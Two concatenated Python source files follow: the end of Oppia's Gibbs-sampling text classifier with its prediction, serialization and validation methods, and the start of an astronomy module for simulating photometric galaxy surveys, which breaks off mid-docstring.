average a higher probability than other labels. To combat this,
all other labels are normalized as if the default label did not
exist. For example, if we have two labels with probability 0.2
and 0.3 with the default label having probability 0.5, the
normalized probability for the two labels without the default
label is 0.4 and 0.6, respectively.
The prediction threshold is currently defined at the classifier level.
A higher prediction threshold indicates that the predictor needs
more confidence prior to making a prediction, otherwise it will
predict DEFAULT_LABEL. This will make non-default predictions more
accurate, but result in fewer of them.
"""
default_label_id = self._get_label_id(feconf.DEFAULT_CLASSIFIER_LABEL)
prediction_label_id = default_label_id
prediction_confidence = 0
label_probabilities = self._get_label_probabilities(d)
normalization_coeff = (
1.0 / (1.0 - label_probabilities[default_label_id]))
for l, prob in enumerate(label_probabilities):
if (l != default_label_id and
prob * normalization_coeff > self._prediction_threshold and
prob * normalization_coeff > prediction_confidence):
prediction_label_id = l
prediction_confidence = prob * normalization_coeff
return {
'prediction_label_id': prediction_label_id,
'prediction_label_name':
self._get_label_name(prediction_label_id),
'prediction_confidence': prediction_confidence,
'all_predictions': label_probabilities
}
def _parse_examples(self, examples):
"""Unzips docs and label lists from examples and returns the two lists.
Docs are split on whitespace. Order is preserved.
"""
docs = []
labels_list = []
for example in examples:
doc_string = example[0]
doc = doc_string.split()
if len(doc) > 0:
labels = example[1]
docs.append(doc)
labels_list.append(labels)
return docs, labels_list
def _iterate_gibbs_sampling(self, iterations, doc_ids):
"""Runs Gibbs sampling for "iterations" number of times on the provided
docs.
"""
for _ in xrange(iterations):
self._run_gibbs_sampling(doc_ids)
def _add_examples(self, examples, iterations):
"""Adds examples to the internal state of the classifier, assigns
random initial labels to only the added docs, and runs Gibbs sampling
for iterations number of iterations.
"""
if len(examples) == 0:
return
docs, labels_list = self._parse_examples(examples)
last_num_labels = self._num_labels
last_num_docs = self._num_docs
last_num_words = self._num_words
# Increments _num_labels with any new labels
for labels in labels_list:
for label in labels:
self._get_label_id(label)
self._num_docs += len(docs)
self._b_dl = numpy.concatenate(
(self._b_dl, numpy.zeros(
(last_num_docs, self._num_labels - last_num_labels),
dtype=int)), axis=1)
self._b_dl = numpy.concatenate(
(self._b_dl, [
self._get_label_vector(labels) for labels in labels_list
]), axis=0)
self._w_dp.extend([map(self._get_word_id, doc) for doc in docs])
self._c_dl = numpy.concatenate(
(self._c_dl, numpy.zeros(
(last_num_docs, self._num_labels - last_num_labels),
dtype=int)), axis=1)
self._c_dl = numpy.concatenate(
(self._c_dl, numpy.zeros(
(self._num_docs - last_num_docs, self._num_labels),
dtype=int)), axis=0)
self._c_lw = numpy.concatenate(
(self._c_lw, numpy.zeros(
(last_num_labels, self._num_words - last_num_words),
dtype=int)), axis=1)
self._c_lw = numpy.concatenate(
(self._c_lw, numpy.zeros(
(self._num_labels - last_num_labels, self._num_words),
dtype=int)), axis=0)
self._c_l = numpy.concatenate(
(self._c_l, numpy.zeros(
self._num_labels - last_num_labels, dtype=int)))
for d in xrange(last_num_docs, self._num_docs):
doc, _ = self._get_doc_with_label_vector(d)
l_p = numpy.random.random_integers(
0, self._num_labels - 1, size=len(doc)).tolist()
self._l_dp.append(l_p)
for w, l in zip(doc, l_p):
self._increment_counting_matrices(d, w, l)
self._iterate_gibbs_sampling(iterations, [d])
return xrange(last_num_docs, self._num_docs)
def add_examples_for_training(self, training_examples):
"""Adds examples to the classifier with _training_iterations number of
iterations.
Args:
training_examples: list of 'examples'. Each example is represented
by a 2-element list. The first item of the list is a str
representing a doc, and the second item is a list of labels
that the doc should be matched to. E.g.:
training_examples = [
['i eat fish and vegetables', ['food']],
['fish are pets', ['pets']],
['my kitten eats fish', ['food', 'pets']]
]
Returns:
xrange. An iterator over the ids of the docs just added.
"""
return self._add_examples(training_examples, self._training_iterations)
def _add_docs_for_predicting(self, prediction_docs):
"""Adds examples to the classifier with _prediction_iterations number
of iterations.
Args:
            prediction_docs: list of str. A list of docs, e.g.:
                prediction_docs = [
'i only eat fish and vegetables'
]
Returns:
xrange. An iterator over the ids of the docs just added.
"""
all_labels = self._label_to_id.keys()
return self._add_examples(
zip(prediction_docs, [
copy.deepcopy(all_labels) for _ in prediction_docs]),
self._prediction_iterations)
def _predict_label_for_doc(self, sample):
"""Returns the predicted label from a sample's prediction report.
Args:
sample: int. A doc id (see example in class docstring).
Returns:
str. The label predicted by the classifier for the given sample.
"""
if (self._num_docs < self._DEFAULT_MIN_DOCS_TO_PREDICT or
self._num_labels < self._DEFAULT_MIN_LABELS_TO_PREDICT):
return feconf.DEFAULT_CLASSIFIER_LABEL
return self._get_prediction_report_for_doc(
sample)['prediction_label_name']
def to_dict(self):
"""Returns a dict representing this StringClassifier.
Returns:
dict. A representation of the state of the classifier.
"""
model = {}
model['_alpha'] = copy.deepcopy(self._alpha)
model['_beta'] = copy.deepcopy(self._beta)
model['_prediction_threshold'] = copy.deepcopy(
self._prediction_threshold)
model['_training_iterations'] = copy.deepcopy(
self._training_iterations)
model['_prediction_iterations'] = copy.deepcopy(
self._prediction_iterations)
model['_num_labels'] = copy.deepcopy(self._num_labels)
model['_num_docs'] = copy.deepcopy(self._num_docs)
model['_num_words'] = copy.deepcopy(self._num_words)
model['_label_to_id'] = copy.deepcopy(self._label_to_id)
model['_word_to_id'] = copy.deepcopy(self._word_to_id)
model['_w_dp'] = copy.deepcopy(self._w_dp)
model['_b_dl'] = copy.deepcopy(self._b_dl)
model['_l_dp'] = copy.deepcopy(self._l_dp)
model['_c_dl'] = copy.deepcopy(self._c_dl)
model['_c_lw'] = copy.deepcopy(self._c_lw)
model['_c_l'] = copy.deepcopy(self._c_l)
return model
def from_dict(self, model):
"""Initializes the properties of this classifier from a dict
constructed using to_dict().
Args:
model: A dict representing a StringClassifier.
"""
self._alpha = copy.deepcopy(model['_alpha'])
self._beta = copy.deepcopy(model['_beta'])
self._prediction_threshold = copy.deepcopy(
model['_prediction_threshold'])
self._training_iterations = copy.deepcopy(
model['_training_iterations'])
self._prediction_iterations = copy.deepcopy(
model['_prediction_iterations'])
self._num_labels = copy.deepcopy(model['_num_labels'])
self._num_docs = copy.deepcopy(model['_num_docs'])
self._num_words = copy.deepcopy(model['_num_words'])
self._label_to_id = copy.deepcopy(model['_label_to_id'])
self._word_to_id = copy.deepcopy(model['_word_to_id'])
self._w_dp = copy.deepcopy(model['_w_dp'])
self._b_dl = copy.deepcopy(model['_b_dl'])
self._l_dp = copy.deepcopy(model['_l_dp'])
self._c_dl = copy.deepcopy(model['_c_dl'])
self._c_lw = copy.deepcopy(model['_c_lw'])
self._c_l = copy.deepcopy(model['_c_l'])
def train(self, training_data):
"""Sets the internal state of the classifier, assigns random initial
labels to the docs, and runs Gibbs sampling for _training_iterations
number of iterations.
Args:
training_data: list of free form texts. Each item is represented
by a 2-element list. The first item of the list is a str
representing a sample, and the second item is a list of labels
that the sample should be matched to. E.g.: [
['i eat fish and vegetables', ['food']],
['fish are pets', ['pets']],
['my kitten eats fish', ['food', 'pets']]
"""
docs, labels_list = self._parse_examples(training_data)
label_set = set(
[feconf.DEFAULT_CLASSIFIER_LABEL] +
[label for labels in labels_list for label in labels])
self._num_labels = len(label_set)
self._label_to_id = dict(zip(label_set, xrange(self._num_labels)))
self._num_words = 0
self._word_to_id = {}
self._num_docs = len(docs)
self._b_dl = numpy.array(
map(self._get_label_vector, labels_list), dtype=int)
self._w_dp = [map(self._get_word_id, doc) for doc in docs]
self._c_dl = numpy.zeros(
(self._num_docs, self._num_labels), dtype=int)
self._c_lw = numpy.zeros(
(self._num_labels, self._num_words), dtype=int)
self._c_l = numpy.zeros(self._num_labels, dtype=int)
self._l_dp = []
for d in xrange(self._num_docs):
doc, _ = self._get_doc_with_label_vector(d)
l_p = numpy.random.random_integers(
0, self._num_labels - 1, size=len(doc)).tolist()
self._l_dp.append(l_p)
for w, l in zip(doc, l_p):
self._increment_counting_matrices(d, w, l)
self._iterate_gibbs_sampling(
self._training_iterations,
xrange(self._num_docs))
def predict(self, predicting_data):
"""Predicts what labels should be set to each sample in
'predicting_data'
Args:
predicting_data: list(str). Each item represents a free form
text input by user.
Returns:
list(prediction report). Each item is a prediction report
for the corresponding sample.
"""
doc_ids = self._add_docs_for_predicting(predicting_data)
return [self._predict_label_for_doc(doc_id) for doc_id in doc_ids]
def validate(self, classifier_data):
"""Validates cached classifier data.
Args:
classifier_data: dict. Consists of various parameter of the
classifier.
"""
float_properties = [
'_alpha',
'_beta',
'_prediction_threshold'
]
int_properties = [
'_training_iterations',
'_prediction_iterations',
'_num_labels',
'_num_docs',
'_num_words'
]
dict_properties = [
'_label_to_id',
'_word_to_id'
]
list_of_list_int_properties = [
'_w_dp',
'_l_dp',
'_c_dl',
'_c_lw'
]
list_of_list_bool_properties = [
'_b_dl'
]
list_properties = [
'_c_l'
]
for float_property in float_properties:
if float_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
float_property)
if not isinstance(classifier_data[float_property], float):
raise utils.ValidationError(
'Expected %s to be a float, received %s' % (
float_property, classifier_data[float_property]))
for int_property in int_properties:
if int_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
int_property)
if not isinstance(classifier_data[int_property], int):
raise utils.ValidationError(
'Expected %s to be a int, received %s' % (
int_property, classifier_data[int_property]))
for dict_property in dict_properties:
if dict_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
dict_property)
if not isinstance(classifier_data[dict_property], dict):
raise utils.ValidationError(
'Expected %s to be a dict, received %s' % (
dict_property, classifier_data[dict_property]))
for key, value in classifier_data[dict_property].iteritems():
if not isinstance(key, basestring):
raise utils.ValidationError(
'Expected key of %s to be a string, received %s' % (
dict_property, key))
if not isinstance(value, int):
raise utils.ValidationError(
'Expected value of %s to be a int, received %s' % (
dict_property, value))
for list_property in list_properties:
if list_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
list_property)
if not isinstance(classifier_data[list_property], list):
raise utils.ValidationError(
'Expected %s to be a list, received %s' % (
list_property, classifier_data[list_property]))
for value in classifier_data[list_property]:
if not isinstance(value, int):
raise utils.ValidationError(
'Expected values of %s to be a int, received %s' % (
list_property, value))
for list_of_list_property in list_of_list_int_properties:
if list_of_list_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
list_of_list_property)
if not isinstance(classifier_data[list_of_list_property], list):
raise utils.ValidationError(
'Expected %s to be a list, received %s' % (
list_of_list_property,
classifier_data[list_of_list_property]))
for inner_list in classifier_data[list_of_list_property]:
for value in inner_list:
if not isinstance(value, int):
raise utils.ValidationError(
'Expected values of %s to be a int, received %s' % (
list_of_list_property, value))
for list_of_list_property in list_of_list_bool_properties:
if list_of_list_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
list_of_list_property)
if not isinstance(classifier_data[list_of_list_property], list):
raise utils.ValidationError(
'Expected %s to be a list, received %s' % (
list_of_list_property,
classifier_data[list_of_list_property]))
for inner_list in classifier_data[list_of_list_property]:
for value in inner_list:
if not isinstance(value, bool):
raise utils.ValidationError(
'Expected values of %s to be bool, received %s' % (
list_of_list_property, value))
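# Illustrative sketch (not part of Oppia): the per-word-instance label
# probabilities computed inside _run_gibbs_sampling(), reproduced here for toy
# counts. Every array value below is a made-up assumption for demonstration;
# the formula multiplies the per-doc label counts term by the per-label word
# counts term, masked by the doc's label bit vector.
def _example_gibbs_label_probabilities():
    alpha, beta = 0.1, 0.001
    num_labels, num_words = 3, 5
    c_dl_d = numpy.array([2, 1, 0])           # label counts for one doc
    c_lw = numpy.zeros((num_labels, num_words), dtype=int)
    c_lw[0, 2] = 2                            # word id 2 seen twice under label 0
    labels = numpy.array([1, 1, 1])           # label bit vector for the doc
    w = 2                                     # word id being resampled
    coeff_a = 1.0 / (c_dl_d.sum() + num_labels * alpha)
    coeff_b = 1.0 / (c_lw.sum(axis=1) + num_words * beta)
    probs = labels * coeff_a * (c_dl_d + alpha) * coeff_b * (c_lw[:, w] + beta)
    return probs / probs.sum()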
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simulate photometric observations.
"""
from __future__ import (print_function, division)
import six
from six.moves import range
import sys
import os
import warnings
import math
import numpy as np
import warnings
from . import priors
from . import reddening
__all__ = ["mag_err", "draw_mag", "draw_type_given_mag",
"draw_redshift_given_type_mag", "draw_ztm", "MockSurvey"]
# Filter lists for pre-set surveys.
_FILTERS = {'cosmos': 'COSMOS.list',
'euclid': 'Euclid.list',
'hsc': 'HSC.list',
'lsst': 'LSST.list',
'sdss': 'SDSS.list'}
# Reference magnitudes for pre-set surveys.
_REFMAGS = {'cosmos': 'i+',
'euclid': 'VIS',
'hsc': 'i',
'lsst': 'r',
'sdss': 'r'}
# Pre-set collection of templates.
_TEMPLATES = {'brown': 'BROWN.list',
'cww+': 'CWWSB4.list',
'polletta+': 'POLLETTASB.list'}
# Pre-set P(z,t,m) priors.
_PRIORS = {'bpz': (priors.pmag, priors.bpz_pt_m, priors.bpz_pz_tm)}
# Pre-set IGM attenuation curves.
_IGM = {'madau+99': reddening.madau_teff}
# Useful constants.
c = 299792458.0 # speed of light in m/s
def mag_err(mag, maglim, sigdet=5., params=(4.56, 1., 1.)):
"""
Compute the magnitude error as a function of a given detection limit
following Rykoff et al. (2015).
Parameters
----------
mag : float or `~numpy.ndarray`
Target magnitude.
maglim : float
Magnitude limit.
sigdet : float, optional
The `sigdet`-sigma detection limit used for `maglim`. Default is `5.`.
params : tuple of shape (3,), optional
Free parameters `(a, b, k)` used in the functional form given by
Rykoff et al. (2015). Default is `(4.56, 1., 1.)`.
Returns
-------
magerr : float or `~numpy.ndarray`
Corresponding magnitude error.
"""
# Set parameters.
a, b, k = params
teff = np.exp(a + b * (maglim - 21.))
# Compute flux/limit.
    F = 10**(-0.4 * (mag - 22.5))
    Flim = 10**(-0.4 * (maglim - 22.5))
    # Compute noise.
    Fnoise = (Flim / sigdet)**2 * k * teff - Flim
    magerr = 2.5 / np.log(10.) * np.sqrt((1. + Fnoise / F) / (F * k * teff))
return magerr
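# Illustrative sketch (not part of the original module): typical use of
# `mag_err`. The 5-sigma depth of 25.0 mag below is an arbitrary choice made
# purely for demonstration.
def _example_mag_err():
    mags = np.linspace(20., 26., 7)
    errs = mag_err(mags, maglim=25.0)  # errors grow sharply near the limit
    return dict(zip(mags, errs))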
def draw_mag(Nobj, pmag, rstate=None, pmag_kwargs=None, mbounds=(10, 28),
Npoints=1000):
"""
Draw `Nobj` magnitudes from the P(mag) function :meth:`pmag`.
Parameters
----------
Nobj : int
The number of objects to draw.
pmag : function
The P(mag) function that magnitudes will be drawn from.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
pmag_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude used to truncate :meth:`pmag`. Default is
`(10, 28)`.
Npoints : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF). Default is `1000`.
Returns
-------
mags : `~numpy.ndarray` of shape (Nobj,)
The magnitudes of the simulated objects drawn from :meth:`pmag`.
"""
if pmag_kwargs is None:
pmag_kwargs = dict()
if mbounds[0] >= mbounds[1]:
raise ValueError("The values {0} in `mbounds` are incorrectly "
"ordered.".format(mbounds))
if rstate is None:
rstate = np.random
# Construct the CDF.
mgrid = np.linspace(mbounds[0], mbounds[1], Npoints) # compute mag grid
pdf_m = pmag(mgrid, **pmag_kwargs) # compute P(m) over grid
cdf_m = pdf_m.cumsum() # compute unnormalized CDF F(x)
cdf_m = np.append(0, cdf_m) / cdf_m[-1] # normalize and left-pad F(x)
lpad = 1e-5 * (mbounds[1] - mbounds[0]) # compute left padding for x
mgrid = np.append(mgrid[0] - lpad, mgrid) # left pad x to match F(x)
# Sample from the inverse CDF F^-1(x).
mags = np.interp(rstate.rand(Nobj), cdf_m, mgrid)
return mags
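# Illustrative sketch (not part of the original module): drawing magnitudes
# from a toy power-law number-count prior P(m) ~ 10**(0.3 * m). The slope and
# magnitude range are arbitrary demonstration values.
def _example_draw_mag(Nobj=1000, seed=5):
    rstate = np.random.RandomState(seed)
    def toy_pmag(m):
        return 10**(0.3 * m)  # un-normalized differential number counts
    return draw_mag(Nobj, toy_pmag, rstate=rstate, mbounds=(18., 25.))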
def draw_type_given_mag(p_type_given_mag, mags, Ntypes, rstate=None,
ptm_kwargs=None):
"""
Draw corresponding types from P(type | mag) using the
:meth:`p_type_given_mag` function. Returns a generator.
Parameters
----------
    p_type_given_mag : function
        Function that takes a type `t` and a magnitude `m` and returns the
        probability (a float) of an object being of that type at the given
        magnitude.
mags : iterable of shape (N,)
Set of input magnitudes.
Ntypes : int
The number of types we can draw.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_type_given_mag`.
Returns
-------
types : `~numpy.ndarray` of shape (N,)
The types of the simulated objects drawn from :meth:`p_type_given_mag`
given `mags`.
"""
if ptm_kwargs is None:
ptm_kwargs = dict()
if rstate is None:
rstate = np.random
# Draw types.
types = np.arange(-1, Ntypes)
for i, m in enumerate(mags):
prob = np.array([p_type_given_mag(t, m, **ptm_kwargs)
for t in range(Ntypes)])
cdf = np.append(0., prob).cumsum() # compute augmented CDF
cdf /= cdf[-1] # normalize
draw = int(np.interp(rstate.rand(), cdf, types) + 1) # index
yield draw # pass back draw as a generator
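# Illustrative sketch (not part of the original module): drawing types from a
# toy, magnitude-independent P(type | mag) over three types. The type
# fractions are arbitrary demonstration values.
def _example_draw_type_given_mag(seed=5):
    rstate = np.random.RandomState(seed)
    def toy_ptm(t, m):
        return [0.5, 0.3, 0.2][t]  # P(type=t | mag), independent of mag
    mags = np.linspace(20., 24., 100)
    return np.array(list(draw_type_given_mag(toy_ptm, mags, 3,
                                             rstate=rstate)))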
def draw_redshift_given_type_mag(p_z_tm, types, mags, rstate=None,
pztm_kwargs=None, zbounds=(0, 15),
Npoints=1000):
"""
Draw corresponding redshifts from P(z | type, mag) using the
    :meth:`p_z_tm` function. Returns a generator.
Parameters
----------
p_z_tm : function
Function that takes in `z`, `t`, and `m` and returns a
probability P(z | t, m).
types : iterable of shape (N,)
Set of input types.
mags : iterable of shape (N,)
Set of input magnitudes.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
pztm_kwargs : dict, optional
        Additional keyword arguments to be passed to :meth:`p_z_tm`.
zbounds : tuple of length 2, optional
The minimum/maximum redshift allowed. Default is
`(0, 15)`.
Npoints : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF). Default is `1000`.
Returns
-------
    redshifts : `~numpy.ndarray` of shape (N,)
        The redshifts of the simulated objects drawn from :meth:`p_z_tm`.
"""
if pztm_kwargs is None:
pztm_kwargs = dict()
if zbounds[0] >= zbounds[1]:
raise ValueError("The values {0} in `zbounds` are incorrectly "
"ordered.".format(zbounds))
if rstate is None:
rstate = np.random
# Compute the redshift grid.
zgrid = np.linspace(zbounds[0], zbounds[1], Npoints)
lpad = 1e-5 * (zbounds[1] - zbounds[0]) # compute left padding for z
zgrid2 = np.append(zgrid[0] - lpad, zgrid) # zgrid with left padding
# Draw redshifts.
for i, (t, m) in enumerate(zip(types, mags)):
# Compute PDF.
try:
pdf_z = p_z_tm(z=zgrid, t=t, m=m, **pztm_kwargs)
except:
pdf_z = np.array([p_z_tm(z=z, t=t, m=m, **pztm_kwargs)
for z in zgrid])
# Compute (augmented) CDF.
cdf_z = pdf_z.cumsum()
cdf_z = np.append(0, cdf_z) / cdf_z[-1] # left pad and normalize
# Draw redshift from inverse CDF F^-1(x).
redshift = max(0., np.interp(rstate.rand(), cdf_z, zgrid2))
yield redshift
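# Illustrative sketch (not part of the original module): drawing redshifts
# from a toy Gaussian P(z | t, m) centered at z=1 with width 0.3 (both
# arbitrary demonstration values, ignoring type and magnitude).
def _example_draw_redshift_given_type_mag(seed=5):
    rstate = np.random.RandomState(seed)
    def toy_pztm(z, t, m):
        return np.exp(-0.5 * ((z - 1.0) / 0.3)**2)
    types = np.zeros(50, dtype='int')
    mags = np.full(50, 22.)
    gen = draw_redshift_given_type_mag(toy_pztm, types, mags, rstate=rstate,
                                       zbounds=(0., 4.))
    return np.array(list(gen))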
def draw_ztm(pmag, p_tm, p_ztm, Nobj, Ntypes, pm_kwargs=None, ptm_kwargs=None,
             pztm_kwargs=None, mbounds=(10, 28), zbounds=(0, 15), Npoints=1000):
"""
Draw `Nobj` redshifts, types, and magnitudes from P(z, type, mag) using the
input P(m) :meth:`pmag`, P(t | m) :meth:`p_tm`, and P(z | t, m)
:meth:`p_ztm` functions.
Parameters
----------
pmag : function
Function that returns P(mag).
    p_tm : function
        Function that takes in a type `t` and a magnitude `m` and returns the
        corresponding probability P(type | mag).
p_ztm : function
Function that takes in `z`, `t`, and `m` and returns P(z | t, m).
    Nobj : int
        The number of instances that should be returned.
    Ntypes : int
        The number of types that can be drawn.
pm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_tm`.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude allowed. Default is
`(10, 28)`.
zbounds : tuple of length 2, optional
The minimum/maximum redshift allowed. Default is
`(0, 15)`.
Npoints : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF). Default is `1000`.
Returns
-------
mags : `~numpy.ndarray` of shape (Nobj,)
Magnitudes of the simulated objects.
types : `~numpy.ndarray` of shape (Nobj,)
Types of the simulated objects.
redshifts : `~numpy.ndarray` of shape (Nobj,)
Redshifts of the simulated objects.
"""
# Draw magnitudes.
mags = np.zeros(Nobj, dtype='float')
mags = draw_mag(Nobj, pmag, pmag_kwargs=pm_kwargs, mbounds=mbounds,
Npoints=Npoints)
# Draw types.
types = np.zeros(Nobj, dtype='int')
    for i, t in enumerate(draw_type_given_mag(p_tm, mags, Ntypes,
                                              ptm_kwargs=ptm_kwargs)):
types[i] = t
# Draw redshifts.
redshifts = np.zeros(Nobj, dtype='float')
for i, z in enumerate(draw_redshift_given_type_mag(p_ztm, types, mags,
pztm_kwargs=pztm_kwargs,
zbounds=zbounds,
Npoints=Npoints)):
redshifts[i] = z
return mags, types, redshifts
class MockSurvey(object):
"""
A mock survey object used to generate and store mock data.
Parameters
----------
survey : str, optional
If provided, will initialize the `MockSurvey` using one of several
built-in presets:
* COSMOS (`'cosmos'`),
* *Euclid* (`'euclid'`),
* HSC SSP (`'hsc'`),
* LSST (`'lsst'`), and
* SDSS (`'sdss'`).
templates : str, optional
If provided, will initialize the `MockSurvey` using one of several
built-in template libraries:
* 129 galaxies from Brown et al. (2014) (`'brown'`),
* 8 templates generated using a combination of galaxies
          from Coleman, Wu & Weedman (1980) and synthetic spectra from Bruzual
& Charlot (2003) spectral models (`'cww+'`), and
* 31 templates generated using a combination of galaxies from
Polletta et al. (2006) and synthetic spectra from Bruzual & Charlot
(2003) (`'polletta+'`).
prior : str or tuple of shape (3,), optional
If a string provided, will initialize the `MockSurvey` using a preset
P(z, type, mag) prior. Otherwise, if a tuple containing P(mag),
P(type | mag), and P(z | type, mag) functions of the form
`(p_m, p_tm, p_ztm)` is provided, those functions will be initialized
instead. Current presets include:
* The Bayesian Photo-Z (BPZ) prior described in Benitez (2000)
(`'bpz'`).
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
"""
def __init__(self, survey=None, templates=None, prior=None, rstate=None):
# filters
self.filters = None
self.NFILTER = None
self.ref_filter = None
# templates
self.templates = None
self.NTEMPLATE = None
self.TYPES = None
self.TYPE_COUNTS = None
self.NTYPE = None
# priors
self.pm = None
self.ptm = None
self.pztm = None
# mock data
self.data = None
if survey is not None:
if survey in _FILTERS:
self.load_survey(survey)
self.set_refmag(_REFMAGS[survey])
else:
raise ValueError("{0} does not appear to be valid survey "
"preset.".format(survey))
if templates is not None:
if templates in _TEMPLATES:
self.load_templates(templates)
else:
raise ValueError("{0} does not appear to be valid template "
"preset.".format(templates))
if prior is not None:
if prior in _PRIORS:
self.load_prior(prior)
else:
raise ValueError("{0} does not appear to be valid prior "
"preset.".format(prior))
        if rstate is None:
            rstate = np.random
        self.rstate = rstate
def load_survey(self, filter_list, path='', Npoints=5e4):
"""
Load an input filter list and associated depths for a particular
survey. Results are stored internally under `filters`.
Parameters
----------
filter_list : str
A list of filters to import. This can be a string from a
collection of built-in surveys or a corresponding file in the
proper format (see `frankenz/filters/README.txt`).
        path : str, optional
            The filepath prepended to `filter_list`. Also used to search for
            filters. If `filter_list` is one of the pre-set surveys above,
            the packaged filter directory is used instead.
Npoints : int, optional
The number of points used to interpolate the filter transmission
curves when computing the effective wavelength. Default is `5e4`.
"""
# Get filter list.
try:
filter_list = _FILTERS[filter_list]
path = os.path.dirname(os.path.realpath(__file__)) + '/filters/'
except:
pass
# Load filter list.
f = open(path + filter_list)
self.filters = []
filter_paths = []
for line in f:
index, name, fpath, fdepth_mag = line.split()
fdepth_mag = float(fdepth_mag)
fdepth_flux = 10**((fdepth_mag - 23.9) / -2.5) / 5. # noise [uJy]
fltr = {'index': int(index), 'name': name,
'depth_mag5sig': fdepth_mag, 'depth_flux1sig': fdepth_flux}
self.filters.append(fltr)
filter_paths.append(fpath)
f.close()
self.NFILTER = len(self.filters) # number of filters
# Extract filters.
for fpath, fltr in zip(filter_paths, self.filters):
wavelength, transmission = np.loadtxt(path + fpath).T
fltr['wavelength'] = wavelength
fltr['transmission'] = transmission
fltr['frequency'] = c / (1e-10 * wavelength)
# Compute effective wavelengths.
for fltr in self.filters:
nuMax = 0.999 * c / (min(fltr['wavelength']) * 1e-10) # max nu
nuMin = 1.001 * c / (max(fltr['wavelength']) * 1e-10) # min nu
nu = np.linspace(nuMin, nuMax, Npoints) # frequency array
lnu = np.log(nu) # ln(frequency)
wave = c / nu # convert to wavelength
lwave = np.log(wave) # ln(wavelength)
trans = np.interp(1e10 * wave, fltr['wavelength'],
fltr['transmission']) # interp transmission
lambda_eff = np.exp(np.trapz(trans * lwave, lnu) /
np.trapz(trans, lnu)) * 1e10 # integrate
fltr['lambda_eff'] = lambda_eff
def load_templates(self, template_list, path='', wnorm=7000.):
"""
Load an input template list. Results are stored internally under
`templates`.
Parameters
----------
template_list : str
A list of templates to import. This can be a string from a
collection of built-in template lists or a corresponding file in
the proper format (see `frankenz/templates/README.txt`).
        path : str, optional
            The filepath prepended to `template_list`. Also used to search for
            templates. If `template_list` is one of the pre-set libraries
            above, the packaged SED directory is used instead.
wnorm : float, optional
The "pivot wavelength" [A] where templates will be normalized.
Default is `7000.`.
"""
# Get template list.
try:
template_list = _TEMPLATES[template_list]
path = os.path.dirname(os.path.realpath(__file__)) + '/seds/'
except:
pass
# Load template list.
f = open(path + template_list)
self.templates = []
template_paths = []
for line in f:
index, name, obj_type, fpath = line.split()
tmp = {'index': int(index), 'name': name, 'type': obj_type}
self.templates.append(tmp)
template_paths.append(fpath)
f.close()
self.NTEMPLATE = len(self.templates) # number of templates
# Divide our templates into groups.
ttypes = [t['type'] for t in self.templates]
_, idx, self.TYPE_COUNTS = np.unique(ttypes, return_index=True,
return_counts=True)
self.TYPES = np.array(ttypes)[np.sort(idx)]
if len(self.TYPES) == 1: # if no types provided, all are unique
self.TYPES = np.arange(self.NTEMPLATE).astype('str')
self.TYPE_COUNTS = np.ones(self.NTEMPLATE)
self.NTYPE = len(self.TYPES)
self.TTYPE = np.array([np.arange(self.NTYPE)[t['type'] == self.TYPES]
for t in self.templates], dtype='int').flatten()
# Extract templates.
for fpath, tmp in zip(template_paths, self.templates):
wavelength, flambda = np.loadtxt(path + fpath).T
tmp['wavelength'] = wavelength
tmp['frequency'] = c / (1e-10 * wavelength)
tmp['flambda'] = flambda
tmp['fnu'] = (wavelength * 1e-10)**2 / c * (flambda * 1e10)
# Normalize flux densities at the pivot wavelength.
for tmp in self.templates:
tmp['flambda'] /= np.interp(wnorm, tmp['wavelength'],
tmp['flambda'])
tmp['fnu'] /= np.interp(wnorm, tmp['wavelength'], tmp['fnu'])
def load_prior(self, prior):
"""
Load the P(z, t, m) prior characterizing the mock survey. Results are
stored internally under `pm`, `ptm`, and `pztm`.
Parameters
----------
prior : str or tuple of shape (3,), optional
If a string provided, will initialize the `MockSurvey` using a
preset P(z, type, mag) prior. Otherwise, if a tuple containing
P(mag), P(type | mag), and P(z | type, mag) functions of the form
`(p_m, p_tm, p_ztm)` is provided, those will be initialized.
"""
try:
self.pm, self.ptm, self.pztm = _PRIORS[prior]
except:
self.pm, self.ptm, self.pztm = prior
def set_refmag(self, ref, mode='name'):
"""
Set the reference magnitude used by the magnitude prior P(mag).
Results are stored internally under `ref_filter`.
Parameters
----------
ref : str or int
Either the name, index, or counter (native position in list) of
the filter.
mode : {`'name'`, `'index'`, `'counter'`}
Whether to search among the provided names/indices (from the
`filter_list` file) or the native position in the filters in the
stored list. Default is `'name'`.
"""
if mode not in {'name', 'index', 'counter'}:
raise ValueError("{0} is not an allowed category.".format(mode))
if mode == 'counter':
self.ref_filter = ref
else:
            sel = [fltr[mode] == ref for fltr in self.filters]
            if not any(sel):
                raise ValueError("{0} does not match any {1} among the "
                                 "filters.".format(ref, mode))
            self.ref_filter = np.arange(self.NFILTER)[sel][0]
def sample_params(self, Nobj, rstate=None, mbounds=None, zbounds=(0, 15),
Nm=1000, Nz=1000, pm_kwargs=None, ptm_kwargs=None,
pztm_kwargs=None, verbose=True):
"""
Draw `Nobj` samples from the joint P(z, t, m) prior. Results are
